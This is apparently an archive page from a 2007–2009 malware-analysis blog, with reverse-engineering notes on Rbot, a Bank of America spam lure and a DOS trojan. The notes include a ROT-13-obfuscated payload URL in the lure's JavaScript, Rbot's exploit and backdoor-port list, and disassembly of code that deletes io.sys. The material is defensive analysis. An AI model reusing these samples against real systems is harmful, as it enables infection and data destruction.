Reversing in Pills – Fast Notes around Infostealer.Banker.C

June 7, 2009

Notes about Reverse Engineering of Malware Banker Infostealer.Banker.C with OllyDbg 2

Fast Notes About Infostealer.Banker.C


Giuseppe ‘Evilcry’ Bonfa’

Backdoor.Win32.UltimateDefender Reverse Engineering

December 8, 2008


I’ve released Backdoor.Win32.UltimateDefender.gtz Reverse Engineering on my Website:


Giuseppe ‘Evilcry’ Bonfa’

IDA Pro Enhances Hostile Code Analysis Support

October 4, 2008


IDA Pro is really amazing, new IDA ( 5.4 ) will have an innovative support for Hostile Code Analysis, that consists on a Bochs Emulated Debug Environment.

“The next version of IDA will be released with a bochs debugger plugin, and what is nice about is that you will be able to use it easily by just downloading bochs executables and telling IDA where to find it.”

“Finally comes the pe loader, which is a specialized bochs loader, that will read your PE file and create a virtual environment similar to windows environment, trying to mimic basic demands for a PE file (import resolution, SEH, api emulation backed by IDC scripts).”

What to say? is a really great enhancement for Malware Analysis 😉

Here you can watch the first video on Bochs Debugging


Giuseppe ‘Evilcry’ Bonfa’ 🙂

[Malware] Backdoor.Win32.Rbot.clj Reversing

December 1, 2007


Kaspersky Identification: Backdoor.Win32.Rbot.clj
MD5: 59c661ba0c7c485f4480f7b142a9c084

Backdoor.Rbot offers user remote access to victim machines. The Trojans are controlled via IRC and perfoms various operations of data estortion:

  • Data Packet filtering passwords to FTP servers, and e-payment systems.
  • Vulnerability check (RPC DCOM, UPnP, WebDAV).
  • Other backdoor check NetDevil, SubSeven.
  • Bridge for DoS attacks.
  • Send the user of the program detailed information about the victim machine, including passwords to a range of computer games.

Rbot is a really stupid and unsophisticated virus, actually detected by all antiviruses, and can be removed in 1 minute by hand.

Rbot is packed with NSPack v 2.9, a truly common packer/compressor used in many viruses.
Unpacking it truly easy:

.nsp1:004DF1B4       pushf ; EP
.nsp1:004DF1B5       pusha

.nsp1:004DF424        popa
.nsp1:004DF425        popf
.nsp1:004DF426        jmp     near ptr dword_4DC8D0 ;OEP

You have only to put a Breakpoint on the JMP OEP, dump and rebuild the executable and you’ll have a 100% clear executable.
Following entries are added:


and for each execution Rbot copies itself (every time with a different name) into  %System% directory.

Rbot can spread itself in various manners:

Via Network Shares (TCP ports 139 and 445)
Via Exploits like Windows LSASS buffer overflow, Windows ntdll.dll buffer overflow, Windows RPC malformed message buffer overflow, RPCSS malformed DCOM, UPnP, DameWare.

Via other Malicious Code:

  • Win32.Bagle worm (TCP port 2745)
  • Win32.Mydoom worm (TCP port 3127)
  • Win32.OptixPro trojan (TCP port 3410)
  • Win32.NetDevil trojan (TCP port 903)
  • Win32.Kuang trojan (TCP port 17300)
  • Win32.SubSeven trojan (TCP port 27347)

.:: Rbot Removal ::.

Locate the executable in %System% directory and remove it (remember that the .exe is Hidden)
Remove the reg keys:

See you to the next post..

Potting the HoneyPot #1

October 15, 2007

This post is strictly correlated with the previous Malware Hunting.

As mentioned earlier, there is a big necessity of automated collection tecnology, such as generic Malware Collector and HoneyPots.

In computer terminology, a honeypot is a trap set to detect, deflect or in some manner counteract attempts at unauthorized use of information systems. Generally it consists of a computer, data or a network site that appears to be part of a network but which is actually isolated, (un)protected and monitored, and which seems to contain information or a resource that would be of value to attackers. A honeypot that masquerades as an open proxy is known as a sugarcane.

It’s necessary to distinguish between various kinds of HoneyPots, but we’re intersted to the Malware Collectors

MultiPot The most easy and little HoneyPot



Argos Argos is a full and secure system emulator designed for use in honeypots. It is based on Qemu, an open source emulator that uses dynamic translation to achieve a fairly good emulation speed.

Honeyd Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their personality can be adapted so that they appear to be running certain operating systems.

HoneyBOT HoneyBOT is a Windows based medium interaction honeypot solution, this HoneyPot supports in a great manner malicious uploading, so can be used for Malware Collection.

Around here, there are also many HoneyPot Projects developed by various organizations that are referred to a common big project, the HoneyNet Alliance

In my experience I’ve seen that the most flexible and powerful HoneyPot Framework, is Honeyd, it can be used in different areas of system security, Network Decoys and the most intersting (for me) Detecting Collecting Worms.

[MALWARE] Bank Of America Virus!!

September 29, 2007

Warning: This post contains Malware, pay attention!!!!

The site hxxp:// (spreaded with Spam Mail) contains a Malware, not explicitly linked.
I’ve used Malzilla to inspect URL content, a suspicious message appears:

Browser Update Required!

This web site uses functions which is not compatible with your current browser version To update your browser please install the requiredupdate to view this page.

Very strange, that no checks about the compatibility are performed before this message, so let’s inspect further..

<script type=”text/javascript”>

var myf_1 = 60;

var myf_10 = “1”;
var myf_11 = “82SSN573-38NN-482N-99NQ-91S697O91631”;
var myf_12 = “uggc://jjj.svyr2lbh.arg/nccyrg.pno”;

These two strings seems to be Obfuscated Links , let’s see the rest of the Evil Code, have a function dc(str), that decodes with an easy algorithm (ROT-13 Encryption) an encrypted string, next we have a function install_ff_result() and function install_ff_ext() that installates FireFox Extension.

Now the extension file is taken from a supect source, file2you, a bit poor for Banks of America, you don’t think? 🙂

So let’s see what are the obfuscated links:

hxxp://{censored against lamah}.cab


hxxp://{censored or lamah}.xpi

Both these links contains the same Malware.

In the next post, i’ll report what this Malware FF Extension does..

See you to the next post 🙂

[Malware] Trojan.DOS.DelIosys.b

September 28, 2007

This morning I’ve received between the classic Spam, a little attachment that contains an old Virus, so I’ve dissected It:

seg000:0100 mov ax, 4301h
seg000:0103 mov dx, 114h
seg000:0106 mov cx, 6
seg000:0109 int 21h ; DOS – 2+ – SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113
seg000:010D mov ah, 41h
seg000:010F int 21h ; DOS – 2+ – DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2
seg000:0113 retn
seg000:0113 start endp

The file is a little COM executable for MS-DOS, which uses two elementary interrupt’s calls, one for Attributes Settings and another for File Deletion (ASCIZ pathname in this case points to io.sys System’s file).

This malware, is identified by the major antivirus as Trojan.DOS.DelIosys.b

File Size: 30 Bytes

MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f

SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835

It’s incredible how old Viruses are still around the web!

See you to the next post 🙂